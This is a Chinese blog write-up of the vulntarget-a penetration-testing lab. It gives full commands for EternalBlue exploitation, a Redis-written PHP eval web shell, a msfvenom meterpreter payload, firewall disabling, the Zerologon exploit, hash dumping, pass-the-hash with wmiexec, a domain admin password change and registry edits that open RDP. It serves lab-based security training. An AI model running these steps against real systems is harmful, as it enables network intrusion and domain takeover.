巨细巨细的白痴级vulntarget-a靶场wp再不会你打死我

已于 2024-06-01 17:58:06 修改
阅读量1k 收藏 15
点赞数 12
文章标签: 服务器 网络 测试工具 安全
于 2024-06-01 15:37:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XYpangSJ/article/details/139371166
版权

ad一,靶场搭建

下载靶场:GitHub - crow821/vulntarget: vulntarget靶场系列

官方拓补图

 ps:此处 攻击机ip192.168.87.134,win7ip1为192.168.87.144

下载完毕后直接装入虚拟机不要进去,不要进去,不要进去

唯一 要修改的是网卡

设置虚拟网卡:默认为vmnet18和vmnet19

找到虚拟网卡编辑器

右下角点更改设置

同下图配置vmnet18

同理配置vmnet19

 

检查各设备的网卡设置

 

单机选设置打开窗口查看

win2019

 

Win11016

 

win7

 

配完去攻击机上访问win7ip看看能否访问,可以就表示配置完成

渗透开始 

信息收集(win7)

nmap  -sT 192.168.87.0/24

发现win7

访问 

查看开放了那些端口

nmap -sT --min-rate 10000 -p- 192.168.87.144

发现开放了445端口,决定用永恒之蓝一把嗦

 输入msfconsole启动msf

clear

search ms17-010

use 0

set Rhost 192.168.87.144

run

 

进入meterperter成功拿下

win7信息收集

ipconfig

发现了c段位20的内网

 但别急先留个路由

run post/multi/manage/autoroute

 退回msf6(小白必看)

bg

back

这么做是为了保存session

搜索20c段的主机

使用arp_scanner模块

use post/windows/gather/arp_scanner
set session 1
set rhosts 10.0.20.0/24

 发现了99主机

使用socks_proxy做代理

use auxiliary/server/socks_proxy
set version 4a
run

修改etc/proxychains4.conf

vim /etc/proxychains4.conf

加上 socks4即可

esc:wq退出

使用proxychains4对10.0.20.99进行端口扫描

proxychains4 nmap -Pn -sT -p21,22,23,80-90,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2601,2604,3128,3306,3311,3312,3389,4440,4848,5432,5560,5900,5901,5902,6082,6379,7001-7010,7778,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,50030,50060,135,139,445,53,88 10.0.20.99

看结果

扫到了 如上端口

开放了80端口访问一下phpinfo.php

ctrl f搜索root

发现了根目录路径

 使用redis未授权访问xieshell

注意kali不会自带redis使用要下载redis

redis下载

参考http://t.csdnimg.cn/FnwUE

proxychains4 redis-cli -h 10.0.20.99

进入目录写入shell

config set dir 'C:/phpStudy/PHPTutorial/WWW/'
config set dbfilename shell.php
set 1 "<?php @eval($_POST['cmd'])?>"
save

 用procychains4代理使用哥斯拉连接

哥斯拉下载

官网https://github.com/BeichenDream/Godzilla

下载jar包后拖入虚拟机使用

注意使用时要保证你处于jar包同更目录不然访问不到

以砖面为例

弹出界面即唱功

 点击target,选择add,如下填写

 添加唱功后enter进入

进入控制台

 关闭防火前以便于传shell

netsh advfirewall set allprofiles state off

用msfvenom写一个shell 

msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe

 可在桌面上发现

打开f哥斯拉的ilemanger 拖入上传

 打开控制台运行shell

.\shell.exe

 msf连接shell

成功

win2016信息收集

ipconfig发现10c段

加个路由先

run post/multi/manage/autoroute

 进shell继续星系收集

shell

Chcp 65001  #优化shell使用utf-8编码

systeminfo

发现了域 vulntarget.com

查看域控(有时不好使)

net group "Domain Controllers" /domain

发现域控win2019ping一下

ping -n 1 WIN2019

ip为 10.0.10.110

CVE-2020-1472上线域控

exp下载

地址https://github.com/VoidSec/CVE-2020-1472

下这个就行,放桌面

运行

proxychains4 python3 cve-2020-1472-exploit.py 域控主机名 域控IP
proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
不行的话
给他加个参数
proxychains4 python3 cve-2020-1472-exploit.py -n WIN2019 -t 10.0.10.110

获取hash

proxychains4 impacket-secretsdump vulntarget.com/win2019\$@10.0.10.110 -no-pass

 得到hash,wmiexec上线

proxychains4 impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6 ./administrator@10.0.10.110

成功

net user administrator p-0p-0p-0 /domain		#修改域控密码
netsh advfirewall set allprofiles state off		#关防火墙

#开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

已完成不做演示,已经打穿

图形化连接域控

使用remmina

apt install -y remmina
或
dnf install -y remmina

启动

proxychains4 remmina

改下配置

连接

 

 

 

成功

修改一下窗口尺寸

点玩后ctrl加滚轮可对其缩放

但有时会遇到连接失败的问题

是3389打开与否问题

可尝试

 reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
  wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
  netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

XYpangSJ
关注
渗透靶场——vulntarget-a(完整版)
tlovejr的博客
03-25 6156
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
拯救初学者,pycharm保姆安装攻略(多图预警,过程巨细
m0_68103885的博客
03-28 1278
史上最全最细心安装教程,一张张截图说明,不信你还学不会
Vulntarget-a靶场实战记录
weixin_50398751的博客
06-14 1400
网络结构:域控、内网、外网 使用技术:通达OA系统漏洞 、Redis未授权访问漏洞 、ms17-010永恒之蓝 、代理转发内网跳板、 CVE-2020-1472 域控杀器Zerologon、wmiexec/smbexec横向移动 、msfconsole、cobalt strike
vultarget-a红日靶场全面解析(完整版)
热门推荐
问彡心的博客
11-02 1万+
这是一次完全的渗透过程,从对外开放的主机开放的通达OA系统漏洞和永恒之蓝漏洞进入第一层主机,并利用其作为跳板机,渗透第二层存在有redis未授权访问的漏洞,在根据添加路由和代理的方式成功拿到最高权限的shell,最终攻击到域控,从web渗透,到横向渗透最后到掌握域控,中间出现过很多的问题,比如通道死机,无法连接,木马程序停止在目标机运行等状况
内网渗透--vulntarget-a
m0_66299232的博客
04-04 1064
1.探测到6379端口,这个端口是redis容易造成未授权访问漏洞,可进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。config set dir "C:/phpStudy/PHPTutorial/WWW/" //切换目录。1.由于靶机开放445端口,并且是win7主机,启动msf进行探测、利用。2.用扫描模块探测主机可能存在永恒之蓝漏洞,进行漏洞利用攻击。11.拿到管理员hash,执行提权exp,成功拿下域控!2.成功连接到redis服务,访问成功,不需要密码。
VulnTarget-a
大熊
06-16 640
实验目标:拿下域控桌面学习目标:信息收集/蚁剑webshell管理/CS上线/msf上线/流量代理转发/提权/漏洞利用等。靶机下载:其中vulntarget-a为本次实验机器》》》靶机信息《《《:::info跨网段需要路由转发。
vulntarget-a靶场的学习思考
weixin_48421613的博客
03-21 6640
前言: 最近玩了一下crow大表哥的靶场,觉得靶场打过之后确实是能用到很多技巧和知识,所以在这里做一些个人的学习总结,文章和靶场适合新人,因为不用做免杀,也可以让人初步的了解一下域环境 靶场由星期五实验室与乌鸦安全共同维护,GIthub可自行下载,Github原文链接以及原过程链接如下 https://github.com/crow821/vulntarget. https://mp.weixin.qq.com/s/uxwbnVOxkR8OBkkY9WW6aQ. 靶场下载地址如下 链接: ht
Java Spring Boot:(三)Spring Boot 项目结构介绍(巨细-项目结构不是那么简单)-6600字匠心出品
地球村
07-10 833
Spring Boot 项目结构介绍1.POM 文件1.继承2.依赖3.插件2.启动类1.启动类与启动器区别2.创建启动类3.启动器4.配置文件1.Properties 格式2.YAML 格式3.配置文件存放位置4.配置文件加载顺序5.配置文件中的占位符6.bootstrap 配置文件5.Spring Boot 的核心注解 1.POM 文件 1.继承 <parent> <groupId>org.springframework.boot</groupId&
【细无巨细,包你学会】自学Python运行时会遇到的异常与解决方法
世上本无鬼
10-11 1343
我们的计算机程序在运行时,有时也会由于各种不可控的原因出现错误。例如:找不到需要的文件、网络错误、用户输入不对等等。这时,计算机程序就会出现无法继续运行的情况,甚至会直接退出。比如:我们常见的手机APP闪退,网站出现500错误,或者Windows里的如下错误: 相信大家遇到这样的情况,都很恼火吧?但计算机程序也是由技术人员编写的,这种情况,是他们也不能处理的“异常情况”。 对于用Python编写的程序。当 Python 检测到一个错误时,解释器无法继续执行,反而出现了一些错误的提示,这就是所谓的"Pytho
Java Dubbo:(四)Dubbo 应用(每一步都展现的清清楚楚-巨细)-15000字匠心巨作
地球村
08-12 286
Dubbo 应用1.创建父工程2.创建服务接口2.1创建项目2.2添加接口3.创建 Provider3.1创建项目3.2修改 POM 文件添加依赖3.3添加接口实现4.添加 Dubbo 的配置文件4.1Dubbo 配置文件的存放位置4.2配置文件内容(二选一)4.2.1使用配置 bean 标签配置接口实现类4.2.2使用注解方式开发服务接口4.2.2.1需改配置文件4.2.2.2修改接口实现类4.3启动 Provider(创建 Dubbo 启动类)5.使用 Zookeeper 客户端工具查看注册信息5.1解
谈谈组策略在注册表中的位置--巨细讲解-大牛编程吧
大牛编程吧
10-15 1042
经常使用Windows的用户都知道组策略和注册表,这两个功能是我们经常使用的,而组策略修改的本质就是在修改注册表的键值。小编对此收集了一些组策略对应的注册表位置详解。为了方便进行Ctrl+F查找,这边就不分页了,有需要的朋友可以收藏起来,留着备用。 程序员编程入门圣地–大牛编程吧请添加链接描述 什么是组策略? 组策略(Group Policy)是Microsoft Windows系统管理员为用户和...
靶场实战】vulntarget-a漏洞靶场实战
最新发布
TT小子的博客
06-20 841
vulntarget-a漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场,其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。
vulntarget】系列:vulntarget-a 练习WP
一只爱吃橙子的羊
07-09 792
vulntarget靶场系列,vulntarget-a 练习WP,会持续更新……
vultarget-a靶场渗透
Christ1na的博客
12-30 403
CVE-2020-1472影响win server2008r到win2019多个操作系统版本,只需要得到域控的用户名且能够访问到目标域控,漏洞不需要主机在域环境下,原理是通过将目标域控密码置空,根据获取的凭得到域管理员的权限。可以发现此win7主机存在双网卡,192.168.14.0为外网环境,10.0.20.0为内网环境。web服务器地址为http://192.168.14.137/,很明显该网站属于通达oa。使用redis写shell,网站绝对路径可在phpinfo界面中获取。使用蚁剑连接shell。
Vulntarget-a打靶记录
qu_xiao_lei的博客
01-26 595
由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可控的情况下,存在较高概率使得产生的密文为全零。这里的原理是:在win2016中上传木马,该木马是将2016的shell反弹至win7中的1111端口,win7中需要用端口转发工具lcx将1111端口中的shell转发至kali的2222端口,这样在kali中监听2222端口就拿到了win2016的shell。
vulntarget-a靶场复现
weixin_52158313的博客
12-29 1012
vulntarget-a靶场复现
渗透靶场——vulntarget-a综合靶场
tlovejr的博客
03-24 4993
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
Vulntarget靶场渗透笔记[持续更新中]
派大星的博客
04-08 7573
Vulntarget靶场渗透笔记 文章目录Vulntarget靶场渗透笔记靶场官方链接Vulntarget-aWriteup网络拓扑环境信息收集win7 MSF上线横向移动win2016cs上线msf上线域渗透域内提权 靶场官方链接 https://github.com/crow821/vulntarget Vulntarget-a Writeup vulntarget漏洞靶场系列(一) 渗透测试练习No.62 内网渗透 vulntarget-a Win7:win7/admin win2016:Admini
vulntarget-e WP
m0_64317625的博客
11-12 1455
vulntarget-e
--wp--preset--color--black:这是什么
07-12
`--wp--preset--color--black` 是一个以双短横线开头的 CSS 自定义属性(CSS Custom Property)。 这个属性看起来是一个特定于某个平台或框架的命名约定,其中 `wp` 可能代表 WordPress,`preset` 可能代表预设,`color` 可能代表颜色,而 `black` 则指定了一个预设的颜色值。然而,这只是我的猜测,具体含义需要根据上下文来确定。 CSS 自定义属性是一种变量,可以在 CSS 中定义一次,并在整个样式表中多次使用。它们非常有用,因为可以将一些常用的值定义为变量,然后在需要的地方引用这些变量,从而实现样式的灵活性和可维护性。 如果你能提供更多关于 `--wp--preset--color--black` 属性的上下文信息,我可以给出更准确的解释。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值